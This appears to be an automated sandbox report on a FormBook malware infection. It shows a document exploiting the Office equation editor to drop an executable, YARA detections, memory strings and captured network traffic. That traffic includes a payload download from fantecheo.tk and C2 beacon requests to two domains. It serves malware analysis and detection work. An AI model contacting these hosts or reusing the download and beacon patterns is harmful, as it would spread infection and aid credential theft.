49 4a 65 39 6e 54 46 33 48 46 41 73 61 6f 58 41 32 44 6e 6d 2b 45 46 78 73 76 33 78 32 37 58 75 48 46 36 36 50 47 38 56 78 36 65 53 72 41 48 2f 73 66 4b 75 69 4c 39 72 39 45 4b 37 6b 2f 62 69 36 46 37 6e 67 61 70 73 77 53 6e 34 42 32 65 30 58 38 4b 71 32 59 30 30 50 6e 4e 4d 4f 6b 4b 57 44 62 77 4a 55 64 54 79 39 49 43 48 6a 2f 30 4c 79 56 32 66 42 38 71 55 5a 68 4c 38 4d 69 4e 44 64 77 34 30 62 6a 2f 67 52 55 50 67 52 70 4c 4a 39 32 39 2f 47 31 66 6a 68 51 69 64 50 58 41 6d 44 73 41 6a 54 44 2b 35 35 6a 34 42 49 52 2b 74 71 4a 65 57 48 49 4f 4f 4c 6d 42 70 4a 53 53 37 45 48 64 48 47 35 70 30 61 66 61 61 34 35 69 56 41 5a 55 66 4c 56 56 4b 70 2f 62 67 73 4d 36 5a 45 4c 6b 59 44 5a 32 63 46 35 7a 65 4
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.465106140.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.448770237.000000000838C000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.424933060.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.446344659.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp4MP&
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.433579752.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.434757196.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.435525841.000000000449C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=12
          Source: explorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: fantecheo.tk
          Source: global trafficHTTP traffic detected: GET /ibefrankszx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /if60/?xPDxn6=9rThgvBPeDs8DTH&9rK4ARq=HAVwTDf9hhdM5uVFiR32xlZPJI7px6PgcsWLOsR2qKnXYIicfNgC1ah67lW/5Lf7WlrZFg== HTTP/1.1Host: www.personowner.guruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /if60/?9rK4ARq=hKBoXJ/uTBXo6goup8EgTG8p/x7KMVUxfENEE605vE090EN0jXzIfy3RZCXjDv+XGbJHcA==&xPDxn6=9rThgvBPeDs8DTH HTTP/1.1Host: www.audiofactaesthetic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\ibeframnk863.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exeJump to dropped file
          .NET source code contains very large stringsShow sources
          Source: ibefrankszx[1].exe.2.dr, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: ibeframnk863.exe.2.dr, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 4.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 5.2.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 5.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 6.0.ibeframnk863.exe.ff0000.0.unpack, Castle.Samples.Extensibility/UI/Input.csLong String: Length: 75776
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.ibeframnk863.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ibeframnk863.exe.354fd50.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ibeframnk863.exe.34be4f0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504459582.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.449384949.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.503955974.00000000000F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.441720043.0000000009657000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.692258695.0000000000310000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.691878203.00000000000B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.421259188.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E21F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4A18
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E1C28
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 4_2_002E4F0F
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00401030
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041D963
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402D8B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041E5B0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409E4B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00409E50
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041EE3B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_0041EF5C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7E0C6
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A83040
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A9905A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7E2E9
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B21238
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7F3CF
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA63DB
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A82305
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00ACA37B
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A87353
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A91489
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AB5485
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A9C5F0
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8351F
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A84680
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8E6C1
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B22622
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8C7BC
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B0579A
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B1F8EE
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA286D
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A8C85C
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A829B2
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B2098E
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A969FE
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B05955
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B33A83
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B2CBA4
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00B0DBDA
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00A7FBD7
          Source: C:\Users\user\AppData\Roaming\ibeframnk863.exeCode function: 6_2_00AA7B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0E0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A13040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0E2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB1238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A0F3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A363DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A12305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A5A37B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A17353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A45485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A21489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A4D47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A2C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A14680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AB2622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A1C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A9579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A457C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00AAF8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00A3286D
